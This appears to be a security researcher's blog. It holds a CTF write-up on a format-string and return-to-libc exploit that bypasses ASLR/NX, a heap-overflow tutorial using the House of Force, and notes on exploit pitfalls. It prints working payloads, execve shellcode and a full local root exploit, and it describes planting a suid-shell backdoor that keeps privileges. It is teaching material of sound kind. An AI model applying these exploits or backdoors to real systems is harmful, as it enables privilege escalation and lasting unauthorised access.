Saturday, 6 April 2013

UCSB iCTF: Hacking Nuclear Plants and Pwning ASLR/NX

The following story took place on a Friday evening, with the sun long gone from the horizon, in a dimly lit room where a few hackers teamed up to do what they do best: fuck shit up.

A former security researcher at KU Leuven took his fifth coffee this hour. Or was it the sixth? He didn't care. Today there was only one thing on his mind: breaking into the nuclear power plants of those Cyberdyne sons o' bitches. It seemed easy enough at first sight. Even his ex-colleague, whom not always had the brightest moments, was able to connect to the power plants using netcat. A nice little menu greeted us:


Our hackers were already familiar with the menu. New nuclear plants could be added and existing ones could be listed. Even the configuration of each power plant, which consists of the number of elements present in the power plant, could easily be updated. And last but not least there were the options to get and set a self-destruct code. This self-destruct code was of course the flag they were after - the reason they were already awake for 16 hours. Unfortunately the self-destruction code can only be accessed if you know a rather lengthy password. But rest assured that such pity defences don't stop true hackers.

By bribing the right people they managed to obtain the binary code responsible for displaying the menu. With this information in hands, it didn't take them long to find the first weak spot in the Cyberdyne system: a format string vulnerability [1]. After a plant is created, or after editing an existing nuclear plant, the amount of uranium was checked by the following function:


The code above was generated by IDA Pro and the Hex-Rays Decompiler, both state of the art tools used by the bad and the good guys. For our hackers it was clear: if the level of uranium is equal or lower to zero, a format string vulnerability is triggered (line 10), potentially enabling them to take over the system. Using the control panel it wasn't possible to edit the plant such that it had a non-positive uranium level, so it wasn't clear how they could force the system to execute this code. But a quick look at the code responsible for adding a new power plant changed the situation:


After staring at this code and getting another coffee, it all became clear. At least for now. Our hackers eagerly discussed it with each other in precise detail: The code first calls get_random_num a few times to initialize the levels of all elements present in the power plant (oxygen, carbon, boron, zirconium and uranium). Uranium is one of those elements. Then the name that has been given to the new power plant (line 6) is copied to the memory region containing all information about the power plant (line 13). This memory region begins with the name of the plant, and ends with the levels of each element. However the string copy function possibly overwrites the levels of each element! This is because all information about a plant is saved in only 112 bytes (see line 4), and the string copy function copies at most 0x70 bytes (line 6). Recall that 0x70 is the hexadecimal representation of 112, meaning the name of the plant potentially overwrites all the other information in the memory region.

After the plant name is copied, the function check_secondary_elems_level checks that the levels of the secondary elements (oxygen, carbon, boron and zirconium) are between, and including, 1 and 999. Our hackers concluded that entering a long name will overwrite the levels of each elements, and if done properly will assure that the vulnerable printf statement gets executed. In other words the vulnerability has been confirmed, and it's time to use it to destroy those Cyberdyne scums.

A Second Entry Point

Amazingly the not-so-bright ex-colleague found another vulnerability in the code. Looking again at the code to add a power plant, and this time focussing on where the data is saved, we get the following:


He saw that there are no checks whether there still is enough memory left when adding a new power plant! The plantid variable, which is used to determine where in memory to save the next plan, is always increased by one without checking whether there's actually space left. Argument a1 is pointing to the memory where the information will be stored and is allocated on the stack by the calling function. Essentially all nuclear plants are stored in one big "list" on the stack, and eventually there won't be enough space to save them all, making the stack go BOOM. And when the stack goes boom, the hackers gain control. Unfortunately it took our colleague a while to find this, and in the end this vulnerability wasn't used. We all smiled though: typical Cyberdyne, they always make more than one mistake.

For hackers the backdoor is always open.
"....that's what she said!"

Bypassing ASLR and NX

Cyberdyne knew the power plant software was not to be trusted. To remedy this they hired some of the best security researchers around the world to create some defences. Unfortunately Cyberdyne was too incompetent to actually implement them, making them ditch all the excellent research. Instead they settled for two other (already well known) protection mechanisms: ASLR and NX

One of the older hackers of the group was reminiscing about exploits and vulnerabilities back in the good old days. The days where all programs, even the operating system, lived in the same memory region. Ah, it was just too easy to exploit programs then. He also recalled how information leakage vulnerabilities were considered useless. These are vulnerabilities that don't let you take over a system, but only make the system reveal some information, like where certain data is stored. The problem is that even though you know where certain data was stored, you can't necessarily read it, making people ignore these attacks. But it was clear to him that such information leakage attacks would be essential to bypass ASLR and eventually attack Cyberdyne.

The older hacker begins his explanation to the youngers ones: The format string exploit can be used as an information leakage attack to defeat ASLR. When using %10$p%11$p as a plant name it will display the saved frame pointer (ebp) followed by the return address (eip). Remark that the plant name must be followed by data so the appropriate number of elements will be overwritten in order to reach the vulnerable printf call. Though the binary isn't position independent, and hence can't fully benefit from ASLR, this information leakage defeats ASLR. The absolute position of libraries can be derived from the pointers in the .GOT section, defeating ASLR for loaded libraries as well. More precisely, the first 4 bytes of the plant name will contain a pointer to the .GOT entry of fork() followed by the string %22$s. This will print out the string located at the .GOT entry of fork() and hence prints out the address of fork (assuming there are no zeros in the address)! Finally, the address of execve() can be found by adding a predictable offset to that of fork(). This teaches us all the addresses we will need when constructing an exploit. The eyes of the other hackers opened wide open - he's right! Even with ASLR we can take this fucker down!

Bypassing protections like a boss.

The second protection mechanism to defat is NX: the stack and heap of the binary are not executable, meaning we can't copy over shellcode and execute it. One of the hackers suggested using a return-oriented programming approach. Quickly they all agreed on this, but simplified the idea to an easier to execute return-to-libc attack. To accomplish this feat they have to control the value of the stack pointer (esp) before executing a return instruction. This can be done by overwriting the saved frame pointer used in the prologue and epilogue of a function. Let's look at the disassembled code of printf to better understand what our hackers are going to do:


Here the register ebp is used to contain the frame pointer, and its value is saved on the stack at the start of the function and restored at the end of the function. Using the format string exploit we can overwrite the saved ebp value, and hence we can control the value of ebp at the end of the printf function. This is done using traditional format string exploits and the %hn format specifier. However, we need to control esp and not ebp! Patience. Let's look at the disassembled code of check_uranium_level:


The next to last instruction is leave, which is equivalent with mov %ebp, %esp followed by pop %ebp. Aha! Here the register esp is set to ebp, and we control ebp since we overwrote it in the call the printf! With control over esp we can do a traditional return-to-libc attack, and in our case we will construct a fake stack frame so the program will execute execve("/bin/sh", NULL, NULL).

The hackers are ready to attack Cyberdyne.

Writing the Exploit

Time to get to business. First the location of the stack and the code (link to code) is extracted using
%10$p:ENDEBP:%11$p:ENDRET: 
Then we extract the location of execve() (link to code). This is done by reading the .GOT entry of fork() and adding the appropriate offset so we end up with the address of execve(). The given input is of the form:
<addr .GOT entry fork>%22$s:ENFORK:
We continue by storing the stack frame for the return-to-libc attack. To construct it we use the addresses extracted in the previous two steps. The code to construct the stack frame and store it is:


Important to note is that the memory region where the power plant info is saved is first initialized to zero. Hence the first few bytes after the plant name also contains zeros, and thus the argv and envp arguments are pointers to NULL.

Finally we trigger the return-to-libc exploit by overwriting the saved frame pointer (ebp) in the print function:


When combining all the parts we get the following beautiful result (link to code):

There is no right and wrong. There's only fun and boring.


Exploit Reliability

A final note is due about the reliability of the current exploit. It assumes there are no whitespace characters (space, tab, newline, vertical-tab, form-feed characters, or terminating zero) within any of the (extracted) addresses. If there are the exploit will fail as not all data of the payload and/or exploit will be read during the scanf call. However this is only a limitation of the current exploit: we can write any byte using the format specifier %hn and read any byte using %s. This allows us to create an exploit which will work under any environment.

Background

The UCSB International Capture The Flag (iCTF) is a computer security challenge where participants have to attack other systems and defend their own. This year we participated with our KU Leuven hacknamstyle research team.

To get a feel of the atmosphere of a security CTF, the video below shows the rwthCTF from the perspective of the organizers (and of course we also participated in that CTF).


For the iCTF our team successfully exploited 4 challenges: nuclearboom, water, pesticides and traintrain. This got us quite some attack points, though we didn't focus on defence, making us end on a respectable 37 place out of 98 participating teams.

In this post I focused on one challenge: nuclearboom. I've already encountered a few write-ups on nuclearboom [codezen, lifayk], but those only explain how to steal the flag, whereas my exploit actually make it spawn a (remote) shell. To do this we have bypassed both ASLR and NXboth widely used protection mechanisms in modern operating systems and programs. It turned out that this challenge was perfect to show how information leakage defeats ASLR, and how a return-oriented-programming techniques can defeat NX.

Footnotes

[1] After accepting an incoming connection stdout, stdin and stderr are replaced with the socket file descriptor using dup2. This way the program can simply use sscanf and printf, knowing that everything actually happens over the TCP connection. So in this case the output of the printf call will be redirected over the TCP connection.

Friday, 8 February 2013

Understanding the Heap & Exploiting Heap Overflows

Understanding heap based exploits can be essential when exploiting a vulnerability. However it's a tricky technique, especially when first learning them. This post will begin with a high level description of the heap and slowly builds up untill you able to write your own exploits. A high level understanding of the heap is a essential when you want to write exploits: It will enable you to tackle new situations without any hassle. But let's not waste too much time with an introduction. We assume we have non-root access to a computer but are able to run the following program as root (meaning it's a suid binary):


There's a blatant buffer overflow in line 10. But does this mistake enable us to execute arbitrary code? Well, who knows... keep reading, and you'll find out! First we need to know how the heap is managed (we focus on Linux).

Basic Heap and Chunk Layout

Every memory allocation a program makes (say by calling malloc) is internally represented by a so called "chunk". A chunk consists of metadata and the memory returned to the program (i.e., the memory actually returned by malloc). All these chunks are saved on the heap, which is a memory region capable of expanding when new memory is request. Similarly the heap can shrink once a certain amount of memory has been freed. A chunk is defined in the glibc source as follows:


Assuming no memory chunks have been freed yet, new memory allocations are always stored right after the last allocated chunk. So if a program were to call malloc(256), malloc(512), and finally malloc(1024), the memory layout of the heap is as follows:
Meta-data of chunk created by malloc(256)
The 256 bytes of memory return by malloc
-----------------------------------------
Meta-data of chunk created by malloc(512)
The 512 bytes of memory return by malloc
-----------------------------------------
Meta-data of chunk created by malloc(1024)
The 1024 bytes of memory return by malloc
-----------------------------------------
Meta-data of the top chunk
The dash line "---" is an imaginary boundary between the chunks, in reality they are placed right next to each other (example program illustrating the layout). Anyway, you're probably wondering why I included the meta data of the "top chunk" in the layout. Well, the top chunk represents the remaining available memory on the heap, and it is the only chunk that can grow in size. When a new memory request is made, the top chunk is split into two: the first part becomes the requested chunk, and the second part is the new the top chunk (so the "top chunk" shrunk in size). If the top chunk is not large enough to fulfill the memory allocation, the program requests the operating system to expand the top chunk (making the heap grow in size).

Interpretation of the Chunk Structure

The interpretation of the chunk structure depends on the current state of the chunk. For example, the only metadata used by an allocated chunk are prev_size and size fields. The buffer returned to the program starts at the fd field. This means an allocated chunk always has 8 bytes of metadata, after which the actual buffer starts. Also surprising is that the prev_size field isn't used by allocated chunks! In a minute we will see that an unallocated (free) chunk does use the additional fields.

Another important observation is that in glibc chunks are always 8-bytes aligned. And to simplify memory management the size of chunks is always a multiple of 8 bytes. This means that the last 3 bits of the size field can be used for other purposes (these 3 bits would always be zero otherwise). Only the first (least significant) bit is important for us. If it's set it means that the previous chunk is in use. If it's not set the previous chunk is not in use. A chunk is not in used if the corresponding memory has been freed (by a call to free).

So how can we check whether the current chunk is in use? Simple really: we navigate to the next chunk by adding size to the pointer of the current chunk, resulting in the location of the next chunk. In this next chunk we read the least significant bit of the size field to see if the chunk is in use.

Managing Free Chunks

We know that when a chunk is freed, the least significant bit of the size field in the meta data of the next chunk must be cleared. Additionally, the prev_size field of this next chunk is set to the size of the now freed chunk.

A freed chunk also uses the fd and bk fields. These are the fields we can potentially abuse in our exploit :) The fd field points to the previous free chunk, and the bk field to the next free chunk. This means free chunks are saved in a doubly linked list. However there isn't just one list contain all free chunks. There are actually multiple lists of free chunks! Each list contains free chunks of a specific size. This makes searching for a free chunk of a certain size a lot faster, since it only has to search in the list supporting the particular size. We now need to correct an earlier statement: When a memory allocation request is made, it first searches for a free chunk that has the same size (or a bit larger), and will reuse that memory. Only if no appropriate free chunk was found will the top chunk be used.

Finally we get to the functionality we will exploit: freeing a chunk! When a chunk is freed (by a call to free) it checks whether the chunk before it has already been freed. In case the previous chunk is not in use, it's coalesced with the chunk being freed. However this increases the size of the chunk. As a result the chunk has to be placed in a different list of free chunks. To do this the already freed chunk is first removed from the linked list, and then the coalesced chunk is added to the appropriate list. The code of removing a chunk from a linked list is:


Here argument P represents the chunk being removed from the list. Arguments BK and FD are output arguments representing the previous and next chunk, respectively. This is very typical code to remove an element from a linked list, and its operation is illustrated below [Source]:

Here the element containing "Lam Larry" is being removed from the list. As you can see, to remove an element from a linked list two operators must be performed:
  1. The backward (bk) pointer of the next element (FD->bk) is set to the pointer of the previous element (BK). This corresponds to line 6 of the unlink function.
  2. The forward (fd) pointer of the previous element (BK->fd) is set to the pointer of the next element (FD). This corresponds to line 7 of the unlink function.
From an attacker perspective, the important thing is that two write operations to the memory are performed. The goal is now to manipulate the metadata so that we can control the value being written, and control where it's written. This allows us to write an arbitrary value to an arbitrary location. With this we can overwrite the function pointer of a destructor, and make it point to our own code.

Side remark: The article Vudo malloc tricks [7] also contains a very good discussion about how malloc works internally. Worth a read!

More Recent Techniques

Unfortunately the technique explained above is no longer possible against newer versions of glibc. The unlink function has been hardened and includes the following runtime check: the forward pointer of the previous chunk must point toward the current chunk. Similarly the previous pointer of the next chunk must also point toward the current chunk:


For the more advanced techniques we will base ourselves on the techniques outlined in the Malloc Maleficarum [5] and the Malloc Des-Maleficarum [6]. The author introduced several techniques and gave them rather special names. The requirements of these techniques are:
  • The House of Prime: Requires two free's of chunks containing attacker controlled size fields, followed by a call to malloc.
  • The House of Mind: Requires the manipulation of the program into repeatedly allocating new memory.
  • The House of Force: Requires that we can overwrite the top chunk, that there is one malloc call with a user controllable size, and finally requires another call to malloc.
  • The House of Lore: Again not applicable to our example program.
  • The House of Spirit: One assumption is that the attacker controls a pointer given to free, so again this technique cannot be used.
  • The House of Chaos: This isn't actually a technique, just a section in the article :)
To conclude: the techniques in the Malloc Maleficarum are not applicable to our very simple example. All techniques require a sufficient (and controllable) amount of calls to free and/or malloc. Now, in sufficiently large programs there should be enough methods to trigger calls to free/malloc, possible making them exploitable. So the real problem is that our example is not realistic: it's just too simple! Therefore we will update the example so it matches a possible scenario we can actually exploit. The updated example is:


It might seem like a big requirement that we can control the size given to the malloc call. This is not necessarily true. Imagine a (networked) service capable of caching objects. To cache an object first the size of the object is sent to the service, after which the object itself is transmitted. In such a program one can easily control the size given to a malloc call. Anyway, this example is something we can exploit, even when compiled against the latest glibc!

Exploitation Technique: The House of Force

Our example program nicely matches the requirements of the House of Force technique. This technique abuses the code responsible for allocating memory from the top chunk. This code is in _int_malloc:


The goal is to overwrite av->top with a user controllable value. The av->top variable always points to the top chunk. During a call to malloc this variable is used to get a reference to the top chunk (in case no other chunks could fulfill the request). This means that if we control the value of av->top, and we can force a call to malloc which uses the top chunk, we control where the next chunk will be allocated (i.e. we control the return value of malloc in line 15 of the example). Consequently we can write arbitrary bytes to any address using line 16.

To make sure the appropriate code gets executed the if-test in line 15 must evaluate to true. This test checks whether the top chunk is large enough to contain the requested chunk (and if enough space remains for the metadata in the top chunk). We want to assure that any request (of arbitrary large size) will use the top chunk. To accomplish this we abuse the overflow in line 11 to overwrite the metadata of the top chunk. First we write 256 bytes to fill up the allocated space, then 4 bytes to overwrite prev_size, and we finally overwrite the size with the largest possible (unsigned) integer:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
./example $LARGETOPCHUNK 1 2
The above won't actually exploit the program, since more steps are needed. But feel free to use a debugger and confirm that the size of the top chunk is indeed modified. We continue by overwriting the variable av->top. Our goal is to make it point 8 bytes before the GOT entry of free. The GOT table is where pointers to dynamically loaded functions are stored. So if we're able to overwrite the pointer to free, we can make the program jump to an arbitrary location (and in particular to our shellcode). To find out the address of the got.plt entry execute:
readelf --relocs example
In my case free was located at 0804a008, which subtracted by 8 becomes 0x804a000. The value being written to av->top is calculated by chunk_at_offset:
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr)(((char*)(p)) + (s)))
We control the second argument: nb (in the #define called s). By debugging the program I found that victim (the older value for av->top) was 0x804b110. Hence the value passed to malloc should be 0x804a000 - 0x804b110 =  FFFFEEF0. We now get:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
./example $LARGETOPCHUNK FFFFEEF0 AAAA
Resulting in a segfault with eip set to 0x41414141 (= the byte encoding of AAAA)! The final step is to point eip to a location under our control. Let's assume ASLR is disabled, so the stack is always at a fixed location. In my case it starts at 0xBFFFFFFF. All that remains is to construct a NOP slide, inject the shellcode, and make eip point towards the NOP slide:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
NOPS=$(perl -e 'print "\x90"x 0x10000')
SC=$'\x68\x2f\x73\x68\x5a\x68\x2f\x62\x69\x6e\x89\xe7\x31\xc0\x88\x47\x07\x8d\x57\x0c\x89\x02\x8d\x4f\x08\x89\x39\x89\xfb\xb0\x0b\xcd\x80'
STACKADDR=$'\x01\xC0\xFF\xBF'
env -i "A=$NOPS$SC" ./example $LARGETOPCHUNK FFFFEEF0 $STACKADDR
Hell yeah! We are now greeted by a nice sh shell! =)

Ahhh, the joy of success!

A few final remarks are in place. First, we used a large NOP slide. This makes it a lot easier to get the stack address (the third argument) correct. Second, the first byte of $STACKADDR starts with 1. This is done to avoid if from containing a NULL byte (which would terminate the string). Finally we placed the NOP slide and shell code into environment variables, and used the env command to clear all other environment variables (resulting in more predictable behaviour of the exploit).

Additionally we could've beaten ASLR by a simple brute force, as we are working on a 32 bit platform. In case DEP is enabled our shellcode on the stack would not be executable, and we would have to fall back on Return Oriented Programming (ROP). This requires controlling the value of esp, which can be done by overwriting the value of a saved frame-pointer (saved ebp value).

Conclusion

We have successfully exploited the second example program. Additionally it was explained how both DEP and ASLR can be bypassed.

References

[1] Justin N. Ferguson, Understanding the heap by breaking it. Blackhat USA, 2007.
[2] J. Koziol, D. Litchfield, D. Aitel, C. Anley, S. Eren, N. Mehta, and R. Hassell. The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley, 2003.
[3] Doug Lea, Design of dlmalloc: A Memory Allocator. Personal website.
[4] Andries Brouwer, Hackers Hut: Exploiting the heap.
[5] Phantasmal Phantasmagoria, The Malloc Maleficarum. bugtraq mailing list, 2005.
[6] blackngel, Malloc Des-Maleficarum. Phrack Volume 0x0d, Issue 0x42, 2009.
[7] MaXX, Vudo malloc tricksPhrack Volume 0x0b, Issue 0x39, 2001.

Monday, 5 November 2012

Common Pitfalls When Writing Exploits

When you're exploiting software (legally hopefully ;) there are some common problems you might encounter. In this post I'm going to focus on three specific problems. I'll assume you're already familiar with basic buffer overflows and have tried to write one before. Oh and even if you were successful in writing the exploit, maybe you encountered some annoyances that are addressed in this posts. Let's go!

My exploit only works under gdb?

A common question people ask is why their exploit works when running the target program in gdb, but why no longer works when the program is started normally. There's actually another variation of this question: people wonder why they didn't obtain elevated privileges when executing the exploit under gdb. I'll first explain the elevated privileges problem and then we'll address the original problem.

No elevated privileges

When you are exploiting a suid program (e.g., for local privilege escalation) your exploit may work under gdb, yet you don't obtain any new privileges. First and for all, a "suid program" is a program that a normal user can execute, but runs under root privileges (to be precise it runs as the user that owns the program). Such programs are marked with an "s" suid bit. For example, the passwd utility is a suid program:
root@bt:~# ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 37140 2011-02-14 17:11 /usr/bin/passwd
This makes perfect sense, as passwd has to be able to update /etc/passwd and /etc/shadow and this requires root privileges. As a side note this means that if we can exploit passwd we can elevate our privileges to those of root. To get back to our original problem: if we exploit a suid program under gdb we don't obtain elevated privileges. What's happening? Before we answer this question, one should first realize that this is actually wanted behavior! Otherwise we could simply open the suid binary in gdb and overwrite the current code using
set *(unsigned int)(address) = value
This way one could directly inject shellcode without exploiting anything. So being able to debug a suid binary as a less privileged user shouldn't be possible. Yet you seem to be debugging the suid binary anyway?! Well, when launching the targeted suid program using gdb no elevated privileges will be granted to the program. You can then debug the program, though exploiting it won't result in elevated privileges (since it was not given elevated privileges).

Different stack addresses

Another problem is that the stack addresses of variables, fields, pointers, etc. will change when the targeted program is debugged using gdb. Let's use the following program to investigate these stack differences:


When directly executing the program I got the values "env=0xbfffddbc arg=0xbfffddb4 esp=0xbfffdcfc" but when running it under gdb I got "env=0xbfffdd8c arg=0xbfffdd84 esp=0xbfffdccc". We notice that all the addresses have changed! Why did this happen? Well there's a reason the program also prints the environment variables :) Looking at the output we can see that our program was given different environment variables under gdb. These environment variables are saved on the stack. And if different environment variables are given the space required to save them will also be different. Because of these different space requirements, the stack addresses of variables saved on the stack will change. Looking at the stack layout in the simplified illustration below we see that this influence nearly all stack addresses under in a program:

lower addresses
esp
[argv]
[envp]
higher addresses

Remember that the stack grows towards lower addresses (in the illustration above it grows upwards).

One way to solve this is using the command "env -i ./program". This runs the program using an empty environment. However, when launching gdb using "env -i gdb ./program" and running the program, we notice that gdb still added some environment variables. Damn you gdb! One possible way to deal with this is to include these variables when directly executing the program using something like
env -i COLUMNS=97 PWD=/root LINES=29 SHLVL=0 /root/a.out
Note that gdb uses the full path to start the program, and that this path is given to the program in argv[0]. So we must also use the full path when directly running the program (since the arguments are also saved on the stack). Although the addresses are now the same, this is annoying to do manually all the time. Our approach also breaks a few bash-specific tricks because the SHELL variable is cleared (can be fixed by setting SHELL=/bin/bash). An easier solution is to use this script written by hellman. Directly running the program or debugging now becomes:
./r.sh ./a.out
./r.sh gdb ./a.out
Both runs will have the same stack addresses. Perfect!

Padding in structures, stack, etc.

This is really more of a remark. When given the source code of a program you know the general layout of structures and function stacks. However, you cannot predict actual offsets (i.e., the precise location of fields). The reason is that most compiles will add padding. This is done so that fields are 2-byte or 4-byte aligned (or anything else that your compiler deems appropriate). The introduced padding can be seemingly random. So while you can use the source code to quickly detect vulnerabilities, you should still disassemble the compiled binary to calculate the offsets.

A common question is then "why does my debugger add X amount of padding bytes?" A frequent answer would be for performance, which is hardware/processor dependent. The answer can change for different versions of the compiler as well. There's just no general answer here. Also, another thing the compiler can do is change the order of variables on the stack, say placing a function pointer before a buffer even though it's not declared like that in the source code. (This way overflowing the buffer won't affect the function pointer, and used in combination with stack canaries this is used to decrease the potential impact of buffer overflows.)

Placing a Suid Script or Suid Shell as Backdoor

Alright. Say you've successfully exploited a vulnerability. Then it can be convenient to create a backdoor to easily obtain elevated privileges at a later point in time. Two seemingly easy strategies would be to either create a suid script or copy the /bin/sh executable and making it suid. Unfortunately the first strategy is not possible on Linux, and the second strategy needs some special attention. The first strategy fails because even if the script file is marked with suid, the kernel doesn't grant elevated privileges when starting scripts. Let's confirm this behavior in detail by inspecting the linux kernel. Essentially we need to learn how the kernel starts script files. Remember that scripts are treated as real executables and can be started using something like
execve("/myscripts/somescript.sh", argv, envp);
where we assume somescript.sh starts with "#!" as usual.

So let's assume that a script is being started using the execve system call. This function is implemented in the do_execve_common function in the linux kernel. Essentially it checks for errors, fills in a so-called binary structure parameter, and then calls search_binary_handler [1]. The real work is being done in this last function, which consists of scanning a list of registered binary formats until a match is found, and then calling that handler. Scripts are detected by checking if the file starts with "#!". The handler for scripts is located in binfmt_script.c in the function load_script. In this handler you don't explicitly see something like "don't grant suid to script files". In fact you see no mention of the suid bit at all. But that's the point, suid is never granted in the script handler. On the other hand, if we look at the handler for ELF linux executable, we notice that suid is explicitly set using SET_UID and SET_GUID. [2] The reasons scripts are not run as suid is because it's too easy to write insecure suid scripts.

Now to address the second problem. First, on my machine /bin/sh is a symlink to /bin/bash, so the remaining discussion will be specific to bash. Anyway, as mentioned copying /bin/sh to something like hiddenshell and making it suid can be problematic: You'll notice that starting your copy called hiddenshell won't grant you a suid shell. This is because bash automatically drops its privileges when it's being run as suid (another security mechanism to prevent executing scripts as suid). Looking at the source code of bash confirms this:


We see one interesting global variable in the if test: privileged_mode. Looking further into the code one learns that this flag is set when the "-p" parameter is given. So starting your suid shell using the "-p" parameter won't drop privileges! That solves our problem. To create a backdoor we copy /bin/sh and make it suid. The backdoor shell must then be started with the "-p" parameter.

But even though we solved the original problem, a new question arose. That new question is: Why does calling "system(command)" work in a suid binary. That is, when a normal suid binary calls the system function, that supplied command is also executed as being a suid program. Remember that system(command) will fork the process and then use execve to run "/bin/sh -c command". If bash always drops privileges, the command shouldn't be executed as suid! Let's first look at the code of the system() function in the glibc library:


What's different from our situation? It may seem pretty silly, but the difference is the name of the executable. Yes, try renaming hiddenshell to sh and then execute it again. Now you will get a suid shell even without supplying the "-p" parameter. Apparently my bash installation doesn't drop privileges when it's started using the "sh" command, probably to preserve backwards compatibility. Interestingly this is not behavior defined in the original source code of bash. No, it's a patch added by several linux distributions. See for example the changelog of bash for ubuntu (search for "drop suid"). It's implemented by updating the if test to:
if (running_setuid && privileged_mode == 0 && act_like_sh == 0)
        disable_priv_mode ();
There, that concludes our very detailed discussion of suid scripts and suid shells!


[1] Playing with binary formats, marzo, 1998
[2] I'm actually not happy with this explanation at all. Unfortunately I don't understand the linux kernel well enough to give a really decent explanation. If you know more about this please comment!